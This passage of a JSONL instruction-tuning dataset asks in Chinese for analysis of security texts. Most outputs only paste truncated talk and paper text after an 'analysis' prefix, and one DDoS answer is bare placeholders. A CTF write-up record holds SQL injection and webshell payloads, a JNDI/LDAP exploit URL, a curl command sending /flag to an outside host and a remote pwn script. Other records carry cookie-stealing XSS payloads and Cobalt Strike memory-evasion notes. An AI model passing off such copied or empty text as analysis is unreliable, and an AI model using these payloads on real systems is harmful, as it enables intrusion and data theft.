modules/mod_access.so LoadModule auth_module modules/mod_auth.so LoadModule auth_anon_module modules/mod_auth_anon.s ... LoadModule alias_module modules/mod_alias.so LoadModule rewrite_module modules/mod_rewrite.so Apache Config File Section 2 (Slide 1/3) Section 2 applies to the main non-virtual server. It also sets defaults for the virtual servers that they can override. ### Section 2: Main server configuration User nobody Group #-1 ServerAdmin you@example.com #ServerName www.example.com:80 DocumentRoot \"/usr/local/apache/htdocs\" <Directory /> Options FollowSymLinks AllowOverride None </Directory> Apache Config File Section 2 (Slide 2/3) # This should be changed to whatever you set DocumentRoot to. <Directory \"/usr/local/apache/htdocs\"> Options Indexes FollowSymLinks AllowOverride None Order allow,deny Allow from all </Directory> UserDir public_html #<Directory /home/*/public_html> # AllowOverride FileInfo AuthConfig Limit Indexes # Options MultiViews Indexes SymLinksI", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nStitching numbers Alex Moneger Security Engineer 10th of August 2014 Generating ROP payloads from in memory numbers Cisco Con!dential 2  2013-2014 Cisco and/or its a\"liates. All rights reserved. ! Work for Cisco Systems ! Security engineer in the Cloud Web Security Business Unit (big cloud based security proxy) ! Interested mostly in bits and bytes ! Disclaimer: research own time my opinions not my employers Who am I? Cisco Con!dential 3  2013-2014 Cisco and/or its a\"liates. All rights reserved. 1. Brief ROP overview 2. Automating ROP payload generation 3. Number Stitching 1. Goal 2. Finding gadgets 3. Coin change problem 4. Pros, Cons, Tooling 5. Future Work Agenda Cisco Con!dential 4  2013-2014 Cisco and/or its a\"liates. All rights reserved. Introduction Cisco Con!dential 5  2013-2014 Cisco and/or its a\"liates. All rights reserved. ! Use only gadgets generated by libc or compiler stubs. In short, target the libc or compiler gadgets instead of the binary ones ! Generate payloads using numbers found in memory ! Solve the coin change problem to automatically generate ROP payloads ! Automate the payload generation TL;DR Cisco Con!dential 6  2013-2014 Cisco and/or its a\"liates. All rights reserved. ROP overview Cisco Con!dential 7  2013-2014 Cisco and/or its a\"liates. All rights reserved. ! Re-use instructions from the vulnerable binary ! Control #ow using the stack pointer ! Multi-staged: 1. Build the payload in memory using gadgets 2. Transfer execution to generated payload ! Only way around todays OS protections (let aside home routers, embedded systems, IoT, ) Principle Cisco Con!dential 8  2013-2014 Cisco and/or its a\"liates. All rights reserved. ! Useful instructions => gadgets ! Disassemble backwards from ret instruction ! Good tools available ! Number of gadgets to use is dependent upon target binary Finding instructions Cisco Con!dential 9  2013-2014 Cisco and/or its a\"liates. All rights reserved. ! Once payload is built in memory ! Transfer control by pivotin", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请解释DDoS攻击的原理和防护方法", "input": "", "output": "DDoS攻击是一种常见的网络安全威胁。攻击原理：[具体原理说明]。防护措施：1. [防护方法1] 2. [防护方法2] 3. [防护方法3]", "category": "security_knowledge", "source": "manual"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFooling Image Search Engine Yuanjun GongBin Liang*Jianjun Huang {Gongyuanjun, liangb, hjj}@ruc.edu.cn Renmin University of China 1 2 1. Introduction 2. Technical Background 3. Methodology 4. Attacking Google Image Search Engine 5. Discussion 6. Conclusion Outline  Image search engines (e.g. Google, Baidu) provide service of reverse image search, or search by image, to allow users to search for related images by uploading an image or image URL.  Reverse image search is a content-based image retrieval (CBIR) query technique that involves providing the CBIR system with a sample image that it will then base its search upon; in terms of information retrieval, the sample image is what formulates a search query.[1] Reverse image search may be used to  Locate the source of an image  Find higher resolution versions  Track down the content creator  Detect plagiarism [1]https://en.wikipedia.org/wiki/Reverse_image_search 1. Introduction Query image x Search result 4  Query image Search result 5 Query image Search result 6 Plagiarism Detection Original image Poster of a TV play suspected plagiarism The poster of TV play Fuyao released in June 2016, was accused of plagiarism. The original image is created in 2014 by LuHe, a painter. 7 Plagiarism Detection  poster Original picture  CBIR system can be a potential attack target.  Adversaries may evade the search engine by introducing perturbations to the query image. 8 +𝜀 Query image x adversarial image x No results Evasion Matching Images Query image x Threat model 9 Evasion Search result: original image Query image 10 Evasion Adversarial image No search result: evasion 11 Images Database Local Features SIFT, SURF, etc. Index Database  Aggregated Feature (BoF, VLAD, etc.) Query image  Image With greatest similarity CBIR framework Similarity matching 2. Technical Background Local Features SIFT, SURF, etc. Aggregated Feature (BoF, VLAD, etc.) 12  Essentially, searching similar images in CBIR systems is a image descriptors matching pr", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2013 Cisco and/or its affiliates. All rights reserved. Page 1 of 20 White Paper Examining the Bitsquatting Attack Surface Bit errors in memory, when they occur in a stored domain name, can direct Internet traffic to the wrong domain potentially compromising security. When a domain name one bit different from a target domain is registered, this is called bitsquatting. This paper describes several previously unknown forms of bitsquatting, and also proposes potential mitigations which do not involve the mass registration of additional bitsquat domains. The conclusion is that the possibility of bitsquat attacks is more widespread than originally thought, but several techniques exist for mitigating the effects of these new attacks. Introduction In the early 1980s, the 7-bit ASCII table became the de facto means of representing text inside computers. Several of the specific bitsquats that are possible today owe their very existence, or their non-existence, to the layout of the ASCII table. The 7-bit ASCII code is actually not a product of modern computers, but is descended from the early 5-bit Baudot codes used in the late nineteenth century and early twentieth centuries by printing telegraph machines. When computers became much more prevalent during the 1950s, it became necessary to standardize the representation of characters between different devices so they could better communicate. By the 1960s, the 5-bit codes used by the telegraph companies had given way to multiple 6-bit codes. Finally in 1963, a seven bit ASCII code was born which was essentially an amalgamation of the FIELDATA military specification, plus the existing ITA-2 telegraph alphabet [1][2]. If you analyze the layout of the ASCII table, some remnants of the old teletypes can be found. For example occupying the very last slot in the 7-bit ASCII table is the DEL or Delete character. In the olden days of punched tape and printing telegraphs, errors could be corrected by punching all the possible holes in a", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nJava安全之Dubbo反序列化漏洞分析 0x00 前言 最近天气冷懒癌又犯了加上各种项目使得本篇文断断续续 0x01 Dubbo 概述 Dubbo是阿里巴巴开源的基于 Java 的高性能 RPC一种远程调用 分布式服务框架SOA致力于 提供高性能和透明化的RPC远程服务调用方案以及SOA服务治理方案dubbo 支持多种序列化方式并 且序列化是和协议相对应的比如Dubbo支持dubbormihessianhttpwebservicethrift redis等多种协议 运行机制 Dubbo框架启动容器Container一启动服务提供者Provider会将提供的服务信息注册到注册中心 Registry注册中心就知道有哪些服务上线了当服务消费者Consumer启动它会从注册中心订阅 subscribe所需要的服务 若某个服务提供者变更比如某个机器下线宕机注册中心基于长连接的方式将变更信息通知给消费 者 消费者可以调用服务提供者的服务同时会根据负载均衡算法选择服务来调用 每次的调用信息服务信息等会定时统计发送给监控中心Monitor监控中心能够监控服务的运行状 态 节点 角色说明 Provider 暴露服务的服务提供方 Consumer 调用远程服务的服务消费方 Registry 服务注册与发现的注册中心 Monitor 统计服务的调用次数和调用时间的监控中心 Container 服务运行容器 以上图片是官方提供的一个运行流程图 1. 服务容器负责启动加载运行服务提供者 2. 服务提供者在启动时向注册中心注册自己提供的服务 3. 服务消费者在启动时向注册中心订阅自己所需的服务 4. 注册中心返回服务提供者地址列表给消费者如果有变更注册中心将基于长连接推送变更数据给 消费者 5. 服务消费者从提供者地址列表中基于软负载均衡算法选一台提供者进行调用如果调用失 败再选另一台调用 6. 服务消费者和提供者在内存中累计调用次数和调用时间定时每分钟发送一次统计数据到监控中 心 在使用Dubbo前需要搭建一个注册中心官方推荐使用Zookeeper 使用 下载解压zookeeper将里面的 zoo_sample.cfg 内容复制到 zoo.cfg 文件中 Zookeeper端口默认是2181可修改进行配置端口 修改完成后运行 zkServer.bat 即可启动Zookeeper dubbo文档 注册服务 定义服务接口 DemoService 定义接口的实现类 DemoServiceImpl 用 Spring 配置声明暴露服务 使用注解配置声明暴露服务在 application.properites 中配置 然后在对应接口使用 @Component 或 @Service 注解进行注册 tickTime=2000 initLimit=10 syncLimit=5 dataDir=D:\\漏洞调试\\zookeeper-3.3.3\\zookeeper-3.3.3\\conf\\data clientPort=2181 package org.apache.dubbo.samples.basic.api; public interface DemoService { String sayHello(String name); } public class DemoServiceImpl implements DemoService { @Override public String sayHello(String name) { System.out.println(\"[\" + new SimpleDateFormat(\"HH:mm:ss\").format(new Date()) + \"] Hello \" + name + \", request from consumer: \" + RpcContext.getContext().getRemoteAddress()); return \"Hello \" + name + \", response from provider: \" + RpcContext.getContext().getLocalAddress(); } } <bean id=\"demoService\" class=\"org.apache.dubbo.samples.basic.impl.DemoServiceImpl\"/> <dubbo:service interface=\"org.apache.dubbo.samples.basic.api.DemoService\" ref=\"demoService\"/> dubbo.scan.base-packages=org.apache.dubbo.samples 引用远程服务 consumer.xml 配置", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n红明CTF Web happysql http://eci-2ze7dlrxgodbblkyir9b.cloudeci1.ichunqiu.com/ username=aaaw2aww\"|| (strcmp((select%0a*%0afrom%0af1ag),concat(\"flag{a4398541\",char(45),\"2ae3\",char(45) ,\"4439\",char(45),\"a4f6\",char(45),\"69eafe0e9b71}\"))%0ain%0a(1))#&password=*/# writeShell http://eci-2ze7dlrxgodbcwxp83gz.cloudeci1.ichunqiu.com/?action=upload&data=%3C? =`cat\\$IFS/!whatyouwantggggggg401.ph*`?%3E easytp 尝试出弱令123456..... 然后读flag javaweb /login/..;/json 绕过鉴权访问/json接 jackson反序列化post Logback反序列化链进JNDI注 [\"ch.qos.logback.core.db.JNDIConnectionSource\", {\"jndiLocation\":\"ldap://ip:8013/#Exploit\"}] 由于jdk版本过法加载远程class这参考http://www.yulegeyu.com/2018/12/04/JN DI-Injection-Via-LDAP-Deserialize/ 利LDAP Server返回序列化数据触发反序列化尝试 反弹shell失败最终使cc5 curl http://ip:port/ -d @/flag拿到flag Reverse g0 https://pan.baidu.com/s/1ey1E5pa7tevQs7-qRpwOwA 提取码GAME 输经过简单乱序后直接作为bigint的rawbytes(big endian)经过base58编码后与预定值较 Pwn 双边协议1.0 nc 8.140.179.11 13452 获得权限后执pwn件同录下的\"getflag\"并输队伍token即可获取flag https://pan.baidu.com/s/1jPP-0fa73PMHiCh-HaKvJg 提取码GAME add 之后 再改个size 似乎就可以溢出了 import base58 1 import string 2 3 def deb58(enc): 4 tbl0 = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz' 5 tbl1 = '12Nrst6CDquvG7BefghJKLMEFHPQZabRSTUVmyzno89ApwxWXYcdkij345' 6 trans = enc.translate(enc.maketrans(tbl1, tbl0)) 7 return base58.b58decode(trans) 8 9 if __name__ == '__main__': 10 ret = deb58('2GVdudkYo2CBXoQii7gfpkjTc4gT') 11 flag = ret[15:]+ret[0:5]+ret[10:15]+ret[5:10] 12 print(flag) 13 14 from pwn import * 1 2 # s = process(\"./Maybe_fun_game\") 3 s = remote(\"8.140.179.11\",\"13452\") 4 5 def parse(buf,size=8): 6 buf = str(buf) 7 tmp = '' 8 tmp += p64(0x1234567812345678) 9 tmp += p64(len(buf)+0x20+size) #c8 10 tmp += p64(size) #d0 11 tmp += p64(len(buf)) #d8 12 for i in range(size): 13 tmp += '\\x41' 14 tmp += str(buf) 15 return b64e(tmp) 16 17 def get(buf): 18 return b64d(buf)[0x28:] 19 20 def add(size,buf=''): 21 s.sendlineafter(\"eFY0EnhWNBIxAAAAAAAAAAgAAAAAAAAACQAAAAAAAABBQUFBQUFBQUNob 2ljZSA/Pg==\",parse(1)) 22 s.sendlineafter", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHCTF2016-Writeup --by Nu1L 目 录 HCTF2016-Writeup.....................................................................................................1 Level1............................................................................................................................2 1. Reverse-Web...............................................................................................2 2. Misc-杂项签到...................................................................................................3 3. Web-2099 年的 flag......................................................................................... 4 Level2............................................................................................................................4 1. Web-ReSrful.................................................................................................4 2. Misc-pic again..............................................................................................5 3. Web-giligile...................................................................................................5 4. Misc-你所知道的隐写就仅此而已吗..........................................................7 5. Misc-gogogo.................................................................................................8 6. Reverse-前年的 400 分...............................................................................8 7. Web-兵者多诡异........................................................................................13 8. Crypto-Crypto So Interesting...................................................................14 9. Pwn-就是干................................................................................................ 14 Level3..........................................................................................................................23 1. Misc-48 小时如何快速精通 c++...............................................................23 2. Web-香港记者还要快..................................................................", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBotnet and Malware behavior analysis 蔡一郎 2010/07/17 Honeynet Project Taiwan Chapter www.honeynet.org.tw  蔡一郎 Steven  學歷國立成功大學電機工程研究所碩士  現任國家高速網路與計算中心 副工程師  重要經歷  國立成功大學研究發展基金會助理研究員  崑山科技大學兼任講師  台南科學園區產學協會理事  Honeynet Project Taiwan Chapter負責人  自由作家  電腦圖書著作33本  Information Security(資安人)Linux GuideNetAdmin專欄計60餘篇  專業證照  RHCECCNACCAICEHCHFIACIAITIL FoundationISO 27001 LACISO 20000 LAC 2 Google Me. Honeynet Project Taiwan Chapter www.honeynet.org.tw Outline  Honeynet and Botnet  Honeynet Project introduction  Taiwan Chapter introduction  What is Honeypot and Honeynet  Honeynet Project Tools  TWMAN 3 Honeynet Project Taiwan Chapter www.honeynet.org.tw  Where can find Malware sample?  UserproviderHoneynet  What is the behavior about Botnet?  Network connectionsystem modify  Multi Function  bots 4 Honeynet and Botnet Honeynet Project Taiwan Chapter www.honeynet.org.tw  Non-profit (501c3) organization with Board of Directors.  Funded by sponsors  Global set of diverse skills and experiences.  Open Source, share all of our research and findings at no cost to the public.  Deploy networks around the world to be hacked.  Everything we capture is happening in the wild.  We have nothing to sell. 5 Honeynet Project introduction Honeynet Project Taiwan Chapter www.honeynet.org.tw  A community of organizations actively researching, developing and deploying Honeynets and sharing the lessons learned.  Awareness: 增進企業與組織對存在於現行網路上的威脅與 弱點之了解進一步思考如何去減輕威脅的方法  Information: 除了提供基本的攻擊活動外進一步提供更關 鍵性的資料如: 攻擊動機駭客間如何聯絡駭客攻破主機 後下一步的攻擊動作  Tools: Honeynet Project 致力於發展 Open Source Tools藉 由這些Tools我們可以更有效率的佈建誘捕系統了解網路環 境攻擊威脅現況 6 Honeynet Project Mission Honeynet Project Taiwan Chapter www.honeynet.org.tw 7 Honeynet Project 全球支會分布 Taiwan Chapter Honeynet Project Taiwan Chapter www.honeynet.org.tw  What is a Honeynet ?  High-interaction Honeypot  It is an architecture, not a product or software  Populate with live systems  Once compromised, data is collected to learn the tools, tactics, and motives of the ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHiding Wookiees in HTTP @regilero HTTP smuggling is a thing we should know better and care about. DEFCON 24 Why wookiees?  It's all about smugglers, wookiee requests and responses  Wookiee language is a thing  hard to speak  Easy to misinterpret Outline  The minimum required on HTTP (Keep-alive, pipelining)  What is HTTP smuggling, exploitations  Some recent attack vectors  HTTP 0.9  Demos: credential hijacking & cache poisoning without a cache  A tool : HTTPWookiee whoami  @regilero (twitter / stack Overflow / Github)  I work in a small French Free Software web company, Makina Corpus (50p).  I'm a DevOp (I was a DevOp before the start of this millenium).  Web Security is a small part of my day job, and spare time.  If I can do it, others might have done it. Why did I start testing my HTTP tools?  I really like working with Open Source HTTP servers and proxies  I found 2 interesting papers:  HTTP Host header real world attacks : http://www.skeletonscribe.net/2013/05/practical-http- host-header-attacks.html  (2005) HTTP smuggling study : http://www.cgisecurity.com/lib/HTTP-Request- Smuggling.pdf HTTP Smuggling: Protocol level Attack  Injection of hidden HTTP message (request or response) inside another  These are usually not browser-based exploits  Crafting low level HTTP messages  By definition, most available tools will NOT generate these bad messages  Usually, get errors without consequences...   but not always Before we start: Keepalives and Pipelines  1 TCP/IP connection per resource  Big perf killer  By the way (and this is still true), the connection ending is complex So, Keepalive  The SYN, SYN/ACK, ACK is made only once, connection is kept open  May be reused for next exchange  If you do not use HTTP/2, chances are this is what your browser does Pipelines, source of most smuggling issues  Not really used  But supported by servers  Still have to wait if one response is big (Head of line blocking)  Wonder why HTTP/2 finally used a real binary multiplexing prot", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n0x01利编辑器的超链接组件导致存储XSS 鄙太菜了没啥质量的洞呀随便篇章吧 在的夜晚某骇客喊我起床挖洞偷瞄了下发现平台正好出活动了想着试吧 先信息收集了下发现个奇怪了域名引起了我的注意访问后发现是个投稿平台可以发布章到后台 进审核 使账户登录进系统就能发现处章管理 第时间就想到发布章再观察系统中发现个不知名的编辑器知道的可以说下存在 超链接 功能 那么就尝试利下吧 在超链接中注伪协议来构造xss 这有个细节就是下的按钮 1. 当处于开启状态时触发超链接按钮后会在新窗中执跳转操作 2. 当处于关闭状态时触发超链接按钮后会在当前站中执javascript操作 所以这就需要关闭掉 发布章后可以看到在正中成功触发javascript 因为这我是直接插的超链接 所以中是处于纯状态 0x02章正处的存储XSS绕过 来到新建章中就是上payload鄙很菜挖XSS都是框就X 在标题处和正中输payload点击提交开启burpsuite抓包 可以看到运作过程是先进前端HTML实体编码处理 这边只要重新替换掉payload就可以达到绕过的效果了 访问发布的章后成功触发XSS 此两个存储XSS提交上去收睡觉 0x03编辑器中的媒体组件导致存储XSS 经过上回的两个存储XSS我觉得还没完第天继续看果然功夫不负有 在测试编辑器的其他功能后发现媒体功能插的资源地址可以回显在 添加络资源 其过滤了很多了标签事件但并不妨碍我们通过burp进FUZZ 选择嵌式媒体经过反复测试构造如下payload x\"><marquee loop=1 width=0 onfinish=alert(document.cookie)> 提交章后访问url 成功触发 0x04编辑器中的媒体组件导致存储XSSBypass 前的漏洞均已提交过了天就修复了本来以为这样就结束了然事情并不如此 既然修复了那么真男就该尝试绕过根据0x03的操作步骤重新打了遍发现其中的种种过滤问题 1. 过滤了alert脚本函数 2. 过滤了不少js事件但Onfinish事件没有过滤 标签也没有进过滤 这个开发估计也是偷懒了过滤做的拉胯的批那我们就对症下药更换 最后也是如愿以偿的执了 因为业务线那边的修复状态原因前还不便更新该站的绕过只能步 x\"><marquee loop=1 width=0 onfinish=prompt(document.cookie 3. 因为业务线那边的修复状态原因前还不便更新该站的绕过只能步 欲知后事如何,请听下回分解 0x05 分享些xsstips 1.当某参数输出的值在JS中被反引号包囊通过${ }可以执javascript 2.SVG中的测试XSS 3.不允许使函数执的WAF可尝试如下payload绕过 4.在测试中也可以尝试使编码绕过多重url编码HTML实体编码json 些字符拼接 或者使回;换 绕过 某些WAF \\r\\n可以实现绕过 payload: <script>var a=`Hello${alert(1)}`</script> <?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\"?> <svgonload=\"window.location='https://www.baidu.com'\"xmlns= </svg> <svg/onload=\"[]['\\146\\151\\154\\164\\145\\162'] ['\\143\\157\\156\\163\\164\\162\\165\\143\\164\\157\\162']('\\141\\154 ()\"> <svg onload\\r\\n=$.globalEval(\"al\"+\"ert()\");> <svg onload\\r\\n=$.globalEval(\"al\"+\"ert()\");>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n我的CS笔记之- In-memory Evasion 4-5 0x00 前言 In-memory Evasion 4-5其中包含了威胁模拟的介绍大致意思就是通过修改c2profile模仿真实APT的样 本会产生的特征行为等也不是百分百模拟就是模拟了一下yara规则中的静态特征感兴趣的小伙伴 自行学习我就不做笔记了除了威胁模拟视频中还介绍了cs3.11引入 的一些内存对抗新功能主要是 Module Stomping和cleanup这2个功能这里不由感叹一句自从CS被卖了以后的更换了老大以 后更新越来越不行了还开始搞java代码混淆class完整性校验多把精力花在怎么进化CS上吧 @Joe Vest @Greg Darwinps:虽然这俩肯定是看不到这个文档的 言归正传我主要记录Module Stomping和cleanup这2个功能 0x01 Module Stomping和cleanup 我们首先回忆一下In-memory Evasion 2中的stageless payload加载过程中的 1. 申请一个块儿内存allocate memory 2. 复制Stager去这一块儿内存里 3. 创建一个线程运行这个Stager 4. 这个Stager会再次申请一块儿内存 5. Stager去下载加密的payload写入申请的内存中 6. Stager把执行流程转递给这个加密的payload 7. 加密的payload自解密成Reflective DLL 8. 然后把执行流程传递给Reflective DLL 9. Reflective DLL 申请一块儿内存 10. 然后初始化自己在新的内存里面 11. 最后reflective DLL 调用payload的入口点函数 上面的步骤分配了2次内存在内存中如图所示 1-3 我们可以使用artifact kit做自定义处理但是9-11就很麻烦9-11是一个反射DLL这个反射dll包含2 部分一部分是反射loader一部分是beacon的功能9-10就是使用反射loader来加载beacon功能的 过程这儿也是被防御查杀拦截的重点我开始对CS4.4新的自定义反射dll loader kit理解错误也是这 儿cs4.4这个自定义kit自定义的只是这个反射loader并不包含beacon的功能而BeaconEye的查杀 点是Beacon功能中的行为因此cs4.4这个kit也不能直接对抗BeaconEye这个kit并不包含自定义 Beacon功能回归正题我们的Module Stomping是怎么在9-11中起作用的 我们知道反射DLL分为反射dll loader和beacon的功能在loader加载功能的时候我们就可以做很多事 情Module Stomping就是在这个过程中起作用的 我们再看看Module Stomping具体是什么技术很简单就是导入一个系统上正常的DLL进入内存 中然后替换内存内容为我们的beacon功能这样可以避免使用虚拟内存分配函数virtualAlloc等同时 让beacon功能看上去很像一个正常DLL这里面存在几个问题 导入的DLL不能太小太小导致内存空间小不能够完全复制我们的beacon功能进去 同一个DLL在不同系统上的大小可能是不一样有些dll在win10上很大08上只有1/3大小因此 你上线win10正常上线08可能就crash了 这个系统的DLL必须有导出函数因为反射loader需要通过导出函数去找DLL在内存中的位置 当然反射loader也有一些防止出错的机制 Author: L.N. / Date: 2021-09-07 Produced by AttackTeamFamily No. 1 / 2 - Welcome to www.red-team.cn 如果配置的系统DLL不存在会返回使用VirtualAlloc 如果配置中的DLL已经被进程导入了会返回使用VirtualAlloc 使用前用一定要用c2lint测试一下 当然了我们写入到内存的beacon代码也是可以开启混淆的因为Module Stomping功能具有一定隐蔽 性因此适合长期潜伏通道同时这个功能也不适合高频次的操作操作多容易出错 我们再回到1-3步中的如果不使用artifact kit自定义使用默认的stageless初始化的时候就存在一次内 存申请申请的内存在后面其实是不会使用了但是也没有释放因此很容易被拿去做内存扫描特征 如果我们设置了cleanup就会调用VirtualFree释放这个初始化过程中的内存 我们开启这3个配置 也是被混淆的 RWX当然也可以通过c2profile配置进行规避 0x02 总结 这个In-memory Evasion系列视频是作者2018年录制的也是cs3", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nexport === 为shell变量或函数设置导出属性 ## 概要 ``` export [-fn] [name[=word]]... export -p ``` ## 主要用途 - 定义一到多个变量并设置导出属性 - 修改一到多个变量的值并设置导出属性 - 删除一到多个变量的导出属性 - 显示全部拥有导出属性的变量 - 为一到多个已定义函数新增导出属性 - 删除一到多个函数的导出属性 - 显示全部拥有导出属性的函数 ## 选项 ```shell -f指向函数 -n删除变量的导出属性 -p显示全部拥有导出属性的变量 -pf显示全部拥有导出属性的函数 -nf删除函数的导出属性 --在它之后的选项无效 ``` ## 参数 name可选变量名或已定义函数名 value可选变量的值 ### 返回值 export返回true除非你提供了非法选项或非法名称 ## 例子 ```shell # 显示全部拥有导出属性的变量 # export -p # export # 显示全部拥有导出属性的函数 # export -pf ``` ```shell # 首先删除要演示的变量名 #unset a b # 定义变量的同时增加导出属性 export a b=3 # 当然也可以先定义后增加导出属性 b=3 export b # 修改拥有导出属性的变量的值 export a=5 b=7 # 当然也可以直接赋值修改 a=5;b=7 # 删除变量的导出属性 export -n a b ``` ```shell # 首先删除要演示的函数名 unset func_1 func_2 # 创建函数 function func_1(){ echo '123'; } function func_2(){ echo '890'; } # 为已定义函数增加导出属性 export -f func_1 func_2 # 删除函数的导出属性 export -fn a b ``` ```shell # 添加环境变量JAVA到`~/.bashrc` PATH=/usr/local/jdk1.7.0/bin:$PATH # 添加当前位置到动态库环境变量 export LD_LIBRARY_PATH=$(pwd):${LD_LIBRARY_PATH} ``` ## 错误用法 - 对未定义的函数添加导出属性 - 对没有导出属性的函数/变量执行删除导出属性操作 - 在 `--` 后使用选项 ## Q&A #### Q对变量或函数设置导出属性有什么用 A它们会成为环境变量可以在脚本中访问它们尤其是脚本中调用的子进程需要时 **[参考链接4][4]**  #### Q如果我编写的脚本修改了已有的环境变量的值那么执行它会在当前终端生效吗会影响之前以及之后打开的终端吗 A只有通过`source`方式调用的脚本会生效您可以查看`source`命令获得更多信息其他方式只是在子shell中执行 之前的不会影响之后的除非是修改了`~/.bashrc`这种启动终端时加载的脚本 **[参考链接1][1]**  #### Q我脚本文件中调用`~/.bashrc`中定义的函数和变量为什么在新打开的终端中通过 `sh` 方式调用该脚本或直接运行 这个当前用户有执行权限的脚本却不能使用这些函数和变量 A请在`~/.bashrc`文件中增加export它们的语句另请参阅 **知识点** 段落 #### Q数组和关联数组也可以设置导出属性吗 A是可以的如果你的bash支持它们不过有些问题 **[参考链接2][2]**  #### Q为什么我在查看变量或函数导出属性的时候显示的开头是`declare` A因为`declare`也能够设置变量或函数的导出属性详见`declare`命令 ### 注意 1. 该命令是bash内建命令相关的帮助信息请查看`help`命令 ### 知识点 在`info bash`或 [bash在线文档](http://www.gnu.org/software/bash/manual/bash.html) 的 `3.7.3`节提到了shell执行环境其中涉及变量和函数的内容如下 > - shell parameters that are set by variable assignment or with set or inherited from the shells parent in the environment > - shell functions defined during execution or inherited from the shells parent in the environment 那么第一句话中的参数又和变量有什么关系呢在`3.4`节第一段中提到 > A varia", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 http://www.soldierx.com/defcon16speech/docsis_insecure_by_design-blake_durandal.ppt Humor 2 Maybe Ted Stevens has a series of hacked modems and a drop amp at his place. Could this be the reason he thinks that the internet is a series of tubes? Background  Personal  Conducted SIPRNET Administration and Red Team Penetration Testing for the USMC.  I currently do research for SERC (Software Engineering Research Center), an NSF Industry/University Cooperative Research Center.  Speech  A much shorter version of this presentation was given at the Spring 2008 SERC Showcase.  Various people (such as Durandal from SOLDIERX) have used the methods in this Defcon presentation to put and keep modems online. 3 What This Speech Will Cover  Requirements (for our examples)  Network Overview  Anonymous Access  Gaining service with a non provisioned MAC address  Cloning a HFC MAC linked to an ISP account  How Anonymous You Really Are  How close ISPs can pinpoint your location as well as techniques to catch people abusing/stealing service  Firmware Overview  Hardware and Security  Specifications, firmware disassembly, current and future security solutions 4 Requirements  What do you need for our examples?  Coaxial connection to the cable company  JTAG cable  MIPS EJTAG (Enhanced Joint Test Action Group)  - USB Cypress or FTDI based JTAG (Fast)  - Parallel buffered/unbuffered JTAG (Slow)  SB5100/5101 cable modem  Other modems can be modified  Soldering Skills + 10 pin header  YouTube is an excellent resource for soldering reference  Applications for flashing the firmware onto a modem  Parallel - Schwartze Katze by tcniso.com  USB - USB JTAG from usbjtag.com 5 Requirements In Depth  Cable connection  EJTAG Cable  Easy to make  Available online  USBJtag  Difficult to make  Really fast 6 Requirements In Depth (contd) 7 Requirements In Depth (contd)  Modify the SB5100/5101 or buy a Premod  (available from sites like www.sbhacker.net) 8 Requirements In Depth (contd)  Program the SB5100/5101", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" Copyright (c) 1980, 1990 The Regents of the University of California. .\\\" All rights reserved. .\\\" .\\\" Redistribution and use in source and binary forms, with or without .\\\" modification, are permitted provided that the following conditions .\\\" are met: .\\\" 1. Redistributions of source code must retain the above copyright .\\\" notice, this list of conditions and the following disclaimer. .\\\" 2. Redistributions in binary form must reproduce the above copyright .\\\" notice, this list of conditions and the following disclaimer in the .\\\" documentation and/or other materials provided with the distribution. .\\\" 3. All advertising materials mentioning features or use of this software .\\\" must display the following acknowledgement: .\\\" This product includes software developed by the University of .\\\" California, Berkeley and its contributors. .\\\" 4. Neither the name of the University nor the names of its contributors .\\\" may be used to endorse or promote products derived from this software .\\\" without specific prior written permission. .\\\" .\\\" THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND .\\\" ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE .\\\" IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE .\\\" ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE .\\\" FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL .\\\" DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS .\\\" OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) .\\\" HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT .\\\" LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY .\\\" OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF .\\\" SUCH DAMAGE. .\\\" .\\\" from: @(#)biff.1 6.5 (Berkeley) 3/14/91 .\\\" .TH BIFF 1 1999-07-31 GNU .Dd July 31, 1999 .Dt BIFF 1 .Os \"Linux NetKit (0.16)\" .Sh \"名称 (NAME)\" .Nm biff .Nd \"新到邮", "category": "text_analysis", "source": "security_papers"}
